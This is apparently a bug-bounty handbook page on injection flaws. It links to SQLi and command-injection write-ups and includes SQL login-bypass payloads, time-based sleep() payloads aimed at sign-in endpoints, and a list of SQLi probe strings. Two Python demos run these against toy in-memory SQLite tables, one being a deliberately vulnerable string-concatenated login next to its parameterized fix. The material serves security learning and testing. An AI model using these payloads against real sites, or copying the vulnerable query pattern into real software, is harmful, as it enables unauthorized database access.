> For the complete documentation index, see [llms.txt](https://gowthams.gitbook.io/bughunter-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/sqli.md).

# Injection

**Blogs / Articles:**

* Blind SQL injection at FastEditor (hema.com) - <https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3>
* Blind Command Injection / SSRF - <https://threat.tevora.com/stop-collaborate-and-listen/>
* Command Injection - <https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z>
* Manual SQL injection discovery tips - <https://gerbenjavado.com/manual-sql-injection-discovery-tips/>
* Practical JSONP Injection - <https://securitycafe.ro/2017/01/18/practical-jsonp-injection/>
* XSLT Server Side Injection Attacks - <https://contextis.com/blog/xslt-server-side-injection-attacks>
* Log Injection - <https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/>
* Remote Code Execution with EL injection - <https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html>
* Argument Injection - <https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/>
* Argument Injection - <https://staaldraad.github.io/post/2019-11-24-argument-injection/>
* Argument Injection - <https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68>
  * Video - <https://www.youtube.com/watch?v=FHiJnw9TTX8>
* AST Injection, Prototype Pollution to RCE - <https://blog.p6.is/AST-Injection/#How-to-Detect>
* SSTI - <https://blog.isec.pl/beyond-ssti/>
* Blind SQLi - <https://bad-jubies.github.io/Blind-SQLi-1/>
* Bypassing an email filter which leads to SQL injection - <https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>
* CSS Injection - <https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092>
* Blind SQL injection detection and exploitation cheatsheet - <https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1>
* Bug bounty writeups: exploiting SQL injection - <https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716>
* SQL injection payload list - <https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b>
* SQL Injection - <https://twitter.com/rodoassis/status/1438186092486877190?s=20>
* X-Forwarded-For SQL injection - <https://outpost24.com/blog/X-forwarded-for-SQL-injection>
* How I Escalated a Time-Based SQL Injection to RCE - <https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398>

**Payloads / Cheatsheets:**

* <https://github.com/Gabriel-Labs/OOB-SQLi>

**Twitter Threads / Tips:**

* [**https://github.com/xer0days/SQLi-Query-Tampering**](https://github.com/xer0days/SQLi-Query-Tampering) **-** [**https://twitter.com/Xer0Days/status/1292488714241941504?s=20**](https://twitter.com/Xer0Days/status/1292488714241941504?s=20)
* [Time-based SQL injection in a sign-in endpoint](https://twitter.com/sunilyedla2/status/1333029227994628096?s=20) - "1. Time Based SQL Injection: Used payload: `'+(select*from(select(sleep(20)))a)+'` in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters [like username, email, otp] for SQLi check. 2. Reflected XSS + CSRF to Account Takeover :)"
* [Time-based SQLi in a forgot-password endpoint](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20) - "1. Payload used: `'%2b(select*from(select(sleep(20)))a)%2b'` 2. Endpoint: /Forgot password. Cheers. Do share your story in comments if you got SQLi at weird endpoint"
* SPEL Injection - <https://twitter.com/h1pmnh/status/1425831338234589184?s=20>
* EL Injection - <https://twitter.com/secalert/status/1119526862521282560?s=20>

**Tools:**

**Other References:**

Login-bypass payloads, injected into the username (or password) field of a query of the form `SELECT * FROM users WHERE username='$u' AND password='$p'`. The comment style is database-specific: `#` is MySQL-only, and MySQL also requires whitespace after `--`, so a `--` immediately followed by the application's closing quote is not a comment there; `--` and `/* */` are otherwise widely supported:
```
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```
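Added example, not from this page or from any of the linked write-ups: the login-bypass payloads above run against a deliberately vulnerable string-concatenated login query and its parameterized fix, on a constructed in-memory SQLite table (the users and passwords are made up for the demo). SQLite understands `--` and `/* */` comments but not MySQL's `#`, so the `#` variants show up here as SQL errors rather than bypasses.

```python
import sqlite3

# Constructed sample data for the demo (not from the page): one admin, one user.
USERS = [("admin", "correct-horse", "admin"), ("alice", "hunter2", "user")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                "username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)", USERS)
    return con


def login_vulnerable(con, username, password):
    """Deliberately vulnerable: user input is spliced into the SQL text, so a
    quote in the username ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    """Hardened form: bound parameters are never parsed as SQL, so the same
    payload is compared literally against the username column."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


def try_payloads(payloads, password="wrong-password"):
    """Feed each payload as the username, with a wrong password, to both logins.

    Returns {payload: (vulnerable_result, safe_result)}: the matched
    (username, role) row on bypass, None when access is denied, or the
    string "SQL error: ..." when the database rejects the mangled query."""
    con = make_db()
    results = {}
    for payload in payloads:
        outcome = []
        for login in (login_vulnerable, login_safe):
            try:
                outcome.append(login(con, payload, password))
            except sqlite3.Error as exc:
                outcome.append(f"SQL error: {exc}")
        results[payload] = tuple(outcome)
    return results


if __name__ == "__main__":
    demo = ["admin' --", "admin' or '1'='1", "' or 1=1--", "' or '1'='1", "admin' #"]
    for payload, (vuln, safe) in try_payloads(demo).items():
        print(f"{payload!r:24} vulnerable={vuln!r:34} safe={safe!r}")
```

Note that a bare `' or '1'='1` in the username does not bypass this query: `AND` binds tighter than `OR`, so the clause becomes `username='' OR ('1'='1' AND password='wrong-password')`, which is false. That is why the working payloads either comment out the password check (`admin' --`, `' or 1=1--`) or put the `OR` after a real username (`admin' or '1'='1`).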

[Bug Bounty Tips: This is how to find SQL injection 100% of the time](https://twitter.com/community_bug/status/1345942914296205316?s=20):

```
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'    <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
```
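Added example, not from the tweet or from this page: a throwaway probe harness that runs the tweet's `q` probes against a constructed toy backend (an in-memory SQLite table with the `id` value spliced unquoted into the query, which is an assumption made for the demo) and labels each response against the `/?q=1` baseline. The `/?q[]=1` form is handled by the web framework before any SQL runs, so it is left out. The tell a tester is looking for is the pair: a bare quote breaks the query, while the same quote wrapped in a `/*...*/` comment leaves the response identical, or `1 or 1=1` returns extra rows. Against a real target, replace `handle` with an HTTP request and compare status, length and body the same way.

```python
import sqlite3

# The probe values from the tweet above, as raw values of the q parameter.
PROBES = ["1", "1'", '1"', "[1]", "1`", "1\\", "1/*'*/", "1/*!1111'*/",
          "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='"]


def make_app():
    """Constructed toy backend (assumption, not a real site): the id parameter
    is concatenated unquoted into the query, the classic numeric injection point.
    Returns a handler mapping q -> (status, body), standing in for an HTTP call."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)",
                    [(1, "widget"), (2, "gadget"), (3, "gizmo")])

    def handle(q):
        sql = f"SELECT name FROM products WHERE id = {q}"
        try:
            rows = con.execute(sql).fetchall()
        except sqlite3.Error as exc:
            return 500, f"database error: {exc}"
        return 200, ",".join(r[0] for r in rows)
    return handle


def classify(baseline, response):
    """Label a probe response relative to the baseline (status, body) of /?q=1."""
    b_status, b_body = baseline
    status, body = response
    if status != b_status:
        return "error" if status >= 500 else "status-change"
    if body == b_body:
        return "same"
    return "more-rows" if len(body) > len(b_body) else "content-change"


def run_probes(handle, probes=PROBES):
    """Send every probe and return {probe: verdict}."""
    baseline = handle("1")
    return {p: classify(baseline, handle(p)) for p in probes}


def looks_injectable(verdicts):
    """Signal worth chasing: a quote breaks the query while a SQL comment
    wrapping the quote repairs it, or a boolean tautology returns extra rows."""
    quote_breaks = verdicts.get("1'") == "error"
    comment_repairs = verdicts.get("1/*'*/") == "same"
    tautology = verdicts.get("1 or 1=1") == "more-rows"
    return (quote_breaks and comment_repairs) or tautology


if __name__ == "__main__":
    verdicts = run_probes(make_app())
    for probe, verdict in verdicts.items():
        print(f"/?q={probe:20} {verdict}")
    print("injectable:", looks_injectable(verdicts))
```

The `/*!1111'*/` probe is a MySQL version-conditional comment; SQLite treats it as an ordinary comment, so here it classifies as `same` just like `/*'*/`. On MySQL the two can differ, which is exactly the kind of difference that fingerprints the backend.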
